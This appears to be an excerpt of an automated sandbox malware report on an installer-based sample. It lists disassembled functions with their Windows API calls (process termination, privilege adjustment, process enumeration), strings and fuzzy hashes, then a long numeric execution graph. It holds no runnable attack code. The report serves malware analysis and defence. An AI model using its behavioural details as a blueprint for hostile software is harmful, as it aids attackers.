                                  • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                  • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                  APIs
                                    • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                  • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                  • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                  • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: lstrcpyn$CreateFilelstrcmp
                                  • String ID: Version
                                  • API String ID: 512980652-315105994
                                  • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                  • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                  • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                  • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                  APIs
                                  • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                  • GetTickCount.KERNEL32 ref: 00403303
                                  • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                  • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                  • String ID:
                                  • API String ID: 2102729457-0
                                  • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                  • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                  • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                  • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                  APIs
                                  • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                  • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                  • String ID:
                                  • API String ID: 2883127279-0
                                  • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                  • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                  • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                  • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                  APIs
                                  • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                  • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: Window$EnableShowlstrlenwvsprintf
                                  • String ID: HideWindow
                                  • API String ID: 1249568736-780306582
                                  • Opcode ID: 2f246f05ebd7dc674da9b5ff0baef701d10e4a3e2a51ec62881f8ce9e704e4b5
                                  • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                  • Opcode Fuzzy Hash: 2f246f05ebd7dc674da9b5ff0baef701d10e4a3e2a51ec62881f8ce9e704e4b5
                                  • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                  APIs
                                  • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                  • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: PrivateProfileStringlstrcmp
                                  • String ID: !N~
                                  • API String ID: 623250636-529124213
                                  • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                  • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                  • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                  • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                  APIs
                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                  • CloseHandle.KERNEL32(?), ref: 00405C71
                                  Strings
                                  • Error launching installer, xrefs: 00405C48
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: CloseCreateHandleProcess
                                  • String ID: Error launching installer
                                  • API String ID: 3712363035-66219284
                                  • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                  • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                  • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                  • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                  APIs
                                  • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                  • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                    • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: CloseHandlelstrlenwvsprintf
                                  • String ID: RMDir: RemoveDirectory invalid input("")
                                  • API String ID: 3509786178-2769509956
                                  • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                  • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                  • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                  • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                  APIs
                                  • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                  • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                  • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                  • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: lstrlen$CharNextlstrcmpi
                                  • String ID:
                                  • API String ID: 190613189-0
                                  • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                  • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                  • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                  • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                  Execution Graph

                                  Execution Coverage:3.7%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:2.3%
                                  Total number of Nodes:2000
                                  Total number of Limit Nodes:120
                                  execution_graph 100512 32e393 100524 2f373a 100512->100524 100514 32e3a9 100515 32e42a 100514->100515 100516 32e3bf 100514->100516 100533 2fb020 100515->100533 100575 2f5376 60 API calls 100516->100575 100518 32e3fe 100523 32e41e Mailbox 100518->100523 100576 358777 59 API calls Mailbox 100518->100576 100521 32ef76 Mailbox 100523->100521 100577 35a2fa 89 API calls 4 library calls 100523->100577 100525 2f3758 100524->100525 100526 2f3746 100524->100526 100527 2f375e 100525->100527 100528 2f3787 100525->100528 100578 2f523c 59 API calls 100526->100578 100579 310f16 100527->100579 100589 2f523c 59 API calls 100528->100589 100532 2f3750 100532->100514 100618 303740 100533->100618 100535 332fe6 100714 35a2fa 89 API calls 4 library calls 100535->100714 100537 2fb07f 100537->100535 100539 333004 100537->100539 100555 2fbb86 100537->100555 100557 2fb132 Mailbox _memmove 100537->100557 100715 35a2fa 89 API calls 4 library calls 100539->100715 100541 33348e 100553 2fb4dd 100541->100553 100758 35a2fa 89 API calls 4 library calls 100541->100758 100542 3330ba 100542->100553 100717 35a2fa 89 API calls 4 library calls 100542->100717 100544 3470ed 59 API calls 100544->100557 100548 333036 100548->100542 100716 2fa9de 294 API calls 100548->100716 100551 2f3b31 59 API calls 100551->100557 100553->100523 100713 35a2fa 89 API calls 4 library calls 100555->100713 100556 2f53b0 294 API calls 100556->100557 100557->100541 100557->100544 100557->100548 100557->100551 100557->100553 100557->100555 100557->100556 100558 333348 100557->100558 100564 3330f3 100557->100564 100565 2f3c30 68 API calls 100557->100565 100568 33339f 100557->100568 100570 2f523c 59 API calls 100557->100570 100572 301c9c 59 API calls 100557->100572 100573 310f16 59 API calls Mailbox 100557->100573 100623 2f3add 100557->100623 100630 2fbc70 100557->100630 100711 2f3a40 59 API calls Mailbox 100557->100711 100712 2f5190 59 API calls Mailbox 100557->100712 100719 346a45 59 API calls 2 library calls 100557->100719 100720 36a78b 85 API calls Mailbox 100557->100720 100721 346a01 59 API calls Mailbox 100557->100721 100722 355d5f 68 API calls 100557->100722 100723 2f3ea3 68 API calls Mailbox 100557->100723 100757 359f97 59 API calls 100557->100757 100724 2f53b0 100558->100724 100561 333378 100561->100553 100752 2f39be 100561->100752 100718 35a2fa 89 API calls 4 library calls 100564->100718 100565->100557 100756 35a2fa 89 API calls 4 library calls 100568->100756 100570->100557 100572->100557 100573->100557 100575->100518 100576->100523 100577->100521 100578->100532 100581 310f1e 100579->100581 100582 310f38 100581->100582 100584 310f3c std::exception::exception 100581->100584 100590 31586c 100581->100590 100607 313503 DecodePointer 100581->100607 100582->100532 100608 3186fb RaiseException 100584->100608 100586 310f66 100609 318631 58 API calls _free 100586->100609 100588 310f78 100588->100532 100589->100532 100591 3158e7 100590->100591 100599 315878 100590->100599 100616 313503 DecodePointer 100591->100616 100593 3158ed 100617 318c88 58 API calls __getptd_noexit 100593->100617 100596 3158ab RtlAllocateHeap 100596->100599 100606 3158df 100596->100606 100598 3158d3 100614 318c88 58 API calls __getptd_noexit 100598->100614 100599->100596 100599->100598 100603 3158d1 100599->100603 100604 315883 100599->100604 100613 313503 DecodePointer 100599->100613 100615 318c88 58 API calls __getptd_noexit 100603->100615 100604->100599 100610 31a2cb 58 API calls 2 library calls 100604->100610 100611 31a328 58 API calls 8 library calls 100604->100611 100612 313201 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 100604->100612 100606->100581 100607->100581 100608->100586 100609->100588 100610->100604 100611->100604 100613->100599 100614->100603 100615->100606 100616->100593 100617->100606 100619 30374f 100618->100619 100622 30376a 100618->100622 100759 301aa4 100619->100759 100621 303757 CharUpperBuffW 100621->100622 100622->100537 100624 2f3aee 100623->100624 100625 32d2fd 100623->100625 100626 310f16 Mailbox 59 API calls 100624->100626 100627 2f3af5 100626->100627 100628 2f3b16 100627->100628 100763 2f3ba5 59 API calls Mailbox 100627->100763 100628->100557 100631 3334cf 100630->100631 100642 2fbc95 100630->100642 100877 35a2fa 89 API calls 4 library calls 100631->100877 100633 2fbf3b 100633->100557 100637 2fc2b6 100637->100633 100638 2fc2c3 100637->100638 100875 2fc483 294 API calls Mailbox 100638->100875 100640 2fc2ca LockWindowUpdate DestroyWindow GetMessageW 100640->100633 100643 2fc2fc 100640->100643 100704 2fbca5 Mailbox 100642->100704 100878 2f5376 60 API calls 100642->100878 100879 346def 294 API calls 100642->100879 100644 334439 TranslateMessage DispatchMessageW GetMessageW 100643->100644 100644->100644 100646 334469 100644->100646 100645 3335e3 Sleep 100645->100704 100646->100633 100647 333f8d WaitForSingleObject 100651 333fad GetExitCodeProcess CloseHandle 100647->100651 100647->100704 100648 2fbf54 timeGetTime 100648->100704 100650 2fc210 Sleep 100650->100704 100659 2fc36b 100651->100659 100655 3342d9 Sleep 100686 3337ce Mailbox 100655->100686 100656 310f16 59 API calls Mailbox 100656->100704 100659->100557 100660 2fc324 timeGetTime 100876 2f5376 60 API calls 100660->100876 100665 334370 GetExitCodeProcess 100670 334386 WaitForSingleObject 100665->100670 100671 33439c CloseHandle 100665->100671 100667 37632a 110 API calls 100667->100686 100669 2f6d79 109 API calls 100669->100704 100670->100671 100670->100704 100671->100686 100672 2f5376 60 API calls 100672->100704 100673 333feb 100673->100659 100674 3343f8 Sleep 100674->100704 100675 3337da Sleep 100675->100704 100677 301a36 59 API calls 100677->100686 100683 2fc26d 100870 301a36 100683->100870 100684 2fb020 272 API calls 100684->100704 100686->100665 100686->100667 100686->100673 100686->100674 100686->100675 100686->100677 100686->100704 100908 301207 100686->100908 100913 352a1b 60 API calls 100686->100913 100914 2f5376 60 API calls 100686->100914 100915 2f3ea3 68 API calls Mailbox 100686->100915 100916 2f6cd8 294 API calls 100686->100916 100957 346ec5 59 API calls 100686->100957 100958 35566c QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 100686->100958 100959 31074e timeGetTime 100686->100959 100960 353fb5 CreateToolhelp32Snapshot Process32FirstW 100686->100960 100689 2fbf25 Mailbox 100689->100633 100874 2fc460 10 API calls Mailbox 100689->100874 100690 35a2fa 89 API calls 100690->100704 100692 2f39be 68 API calls 100692->100704 100694 2f53b0 272 API calls 100694->100704 100695 346ad4 59 API calls Mailbox 100695->100704 100697 301a36 59 API calls 100697->100704 100698 2f3ea3 68 API calls 100698->100704 100699 333d43 VariantClear 100699->100704 100700 2f41c4 59 API calls Mailbox 100700->100704 100701 333dd9 VariantClear 100701->100704 100702 333b87 VariantClear 100702->100704 100703 347890 59 API calls 100703->100704 100704->100645 100704->100647 100704->100648 100704->100650 100704->100655 100704->100656 100704->100659 100704->100660 100704->100669 100704->100672 100704->100683 100704->100684 100704->100686 100704->100689 100704->100690 100704->100692 100704->100694 100704->100695 100704->100697 100704->100698 100704->100699 100704->100700 100704->100701 100704->100702 100704->100703 100705 2f6cd8 272 API calls 100704->100705 100706 2f5190 59 API calls Mailbox 100704->100706 100764 2f52b0 100704->100764 100773 2f9a00 100704->100773 100780 2f9c80 100704->100780 100811 2fa820 100704->100811 100828 36e3d4 100704->100828 100831 36ede4 100704->100831 100853 2fe36d 100704->100853 100862 35c0dd 100704->100862 100869 31074e timeGetTime 100704->100869 100880 301c9c 100704->100880 100884 37641d 59 API calls 100704->100884 100885 359ec5 59 API calls Mailbox 100704->100885 100886 34de8d 59 API calls 100704->100886 100887 2f4d37 100704->100887 100905 346a45 59 API calls 2 library calls 100704->100905 100906 2f38ff 59 API calls 100704->100906 100907 2f3a40 59 API calls Mailbox 100704->100907 100917 36c11d 100704->100917 100705->100704 100706->100704 100711->100557 100712->100557 100713->100535 100714->100553 100715->100553 100716->100542 100717->100553 100718->100553 100719->100557 100720->100557 100721->100557 100722->100557 100723->100557 100725 2f53cf 100724->100725 100750 2f53fd Mailbox 100724->100750 100726 310f16 Mailbox 59 API calls 100725->100726 100726->100750 100727 2f69ff 100730 32e5c1 100727->100730 100731 32f095 100727->100731 100728 2f69fa 100729 301c9c 59 API calls 100728->100729 100747 2f5569 Mailbox 100729->100747 101460 35a2fa 89 API calls 4 library calls 100730->101460 101464 35a2fa 89 API calls 4 library calls 100731->101464 100732 301207 59 API calls 100732->100750 100733 310f16 59 API calls Mailbox 100733->100750 100737 312ea0 67 API calls __cinit 100737->100750 100738 32e5d0 100738->100561 100739 32e9ca 100741 301c9c 59 API calls 100739->100741 100741->100747 100742 301c9c 59 API calls 100742->100750 100744 32ea97 100744->100747 101461 347890 59 API calls 100744->101461 100745 347890 59 API calls 100745->100750 100747->100561 100748 32ee58 101462 35a2fa 89 API calls 4 library calls 100748->101462 100750->100727 100750->100728 100750->100730 100750->100732 100750->100733 100750->100737 100750->100739 100750->100742 100750->100744 100750->100745 100750->100747 100750->100748 100751 2f5a1a 100750->100751 101458 2f7e50 294 API calls 2 library calls 100750->101458 101459 2f6e30 60 API calls Mailbox 100750->101459 101463 35a2fa 89 API calls 4 library calls 100751->101463 100753 2f39c9 100752->100753 100754 2f39f0 100753->100754 101465 2f3ea3 68 API calls Mailbox 100753->101465 100754->100568 100756->100553 100757->100557 100758->100553 100760 301ab7 100759->100760 100762 301ab4 _memmove 100759->100762 100761 310f16 Mailbox 59 API calls 100760->100761 100761->100762 100762->100621 100763->100628 100765 2f52c6 100764->100765 100766 2f5313 100764->100766 100765->100766 100767 2f52d3 PeekMessageW 100765->100767 100768 2f52ec 100766->100768 100770 32de98 TranslateAcceleratorW 100766->100770 100771 2f533e PeekMessageW 100766->100771 100772 2f5352 TranslateMessage DispatchMessageW 100766->100772 100970 2f359e 100766->100970 100767->100766 100767->100768 100768->100704 100770->100766 100770->100771 100771->100766 100771->100768 100772->100771 100774 2f9a1d 100773->100774 100775 2f9a31 100773->100775 100975 2f94e0 100774->100975 101009 35a2fa 89 API calls 4 library calls 100775->101009 100778 2f9a28 100778->100704 100779 3323a8 100779->100779 100781 2f9cb5 100780->100781 100782 3323ad 100781->100782 100784 2f9d1f 100781->100784 100795 2f9d79 100781->100795 100783 2f53b0 294 API calls 100782->100783 100785 3323c2 100783->100785 100788 301207 59 API calls 100784->100788 100784->100795 100810 2f9f50 Mailbox 100785->100810 101019 35a2fa 89 API calls 4 library calls 100785->101019 100786 301207 59 API calls 100786->100795 100790 332408 100788->100790 100789 312ea0 __cinit 67 API calls 100789->100795 101020 312ea0 100790->101020 100791 33242a 100791->100704 100793 2f39be 68 API calls 100793->100810 100794 2f53b0 294 API calls 100794->100810 100795->100786 100795->100789 100795->100791 100797 2f9f3a 100795->100797 100795->100810 100797->100810 101023 35a2fa 89 API calls 4 library calls 100797->101023 100800 2fa775 101027 35a2fa 89 API calls 4 library calls 100800->101027 100802 332729 100802->100704 100803 2f4230 59 API calls 100803->100810 100808 35a2fa 89 API calls 100808->100810 100809 2fa058 100809->100704 100810->100793 100810->100794 100810->100800 100810->100803 100810->100808 100810->100809 101018 301bcc 59 API calls 2 library calls 100810->101018 101024 347890 59 API calls 100810->101024 101025 36ca74 294 API calls 100810->101025 101026 36b9ee 294 API calls Mailbox 100810->101026 101028 2f5190 59 API calls Mailbox 100810->101028 101029 369878 294 API calls Mailbox 100810->101029 100812 332c81 100811->100812 100815 2fa84c 100811->100815 101109 35a2fa 89 API calls 4 library calls 100812->101109 100814 332c92 100814->100704 100816 332c9a 100815->100816 100818 2fa888 _memmove 100815->100818 101110 35a2fa 89 API calls 4 library calls 100816->101110 100820 310f16 59 API calls Mailbox 100818->100820 100821 2fa975 100818->100821 100822 332cde 100818->100822 100823 2f53b0 294 API calls 100818->100823 100825 332cf8 100818->100825 100827 2fa962 100818->100827 100820->100818 100821->100704 101111 2fa9de 294 API calls 100822->101111 100823->100818 100825->100821 101112 35a2fa 89 API calls 4 library calls 100825->101112 100827->100821 101108 36a78b 85 API calls Mailbox 100827->101108 101113 36cf8e 100828->101113 100830 36e3e4 100830->100704 100832 2f4d37 84 API calls 100831->100832 100833 36ee07 100832->100833 100834 353fb5 66 API calls 100833->100834 100835 36ee18 100834->100835 100836 36ee4e OpenProcess 100835->100836 100842 36ee1d 100835->100842 100837 36ef11 TerminateProcess 100836->100837 100838 36ee68 GetLastError 100836->100838 100839 36ef53 CloseHandle 100837->100839 100840 36ef1e GetLastError 100837->100840 100841 36ee73 100838->100841 100848 36eedd 100838->100848 100839->100842 100849 36ef32 100840->100849 101246 35390d 63 API calls Mailbox 100841->101246 100842->100704 100844 36ee81 101247 34917c 62 API calls Mailbox 100844->101247 100846 36ee8b 100847 36ee8f OpenProcess 100846->100847 100851 36eea1 100846->100851 100847->100851 100848->100837 100848->100842 100849->100839 101248 348bcc AdjustTokenPrivileges CloseHandle 100851->101248 100852 36eedb 100852->100848 101249 2f502b 100853->101249 100855 2fe381 100856 2fe3bc Sleep 100855->100856 100857 2fe385 timeGetTime 100855->100857 100859 2fe3b4 100856->100859 100858 2f502b 59 API calls 100857->100858 100860 2fe39b 100858->100860 100859->100704 100861 2fbc70 292 API calls 100860->100861 100861->100859 100863 2f4d37 84 API calls 100862->100863 100864 35c0f3 100863->100864 101254 353e72 100864->101254 100866 35c0fb 100867 35c0ff GetLastError 100866->100867 100868 35c114 100866->100868 100867->100868 100868->100704 100869->100704 100871 301a45 __wsetenvp _memmove 100870->100871 100872 310f16 Mailbox 59 API calls 100871->100872 100873 301a83 100872->100873 100873->100689 100874->100637 100875->100640 100876->100704 100877->100642 100878->100642 100879->100642 100881 301ca7 100880->100881 100882 301caf 100880->100882 101379 301bcc 59 API 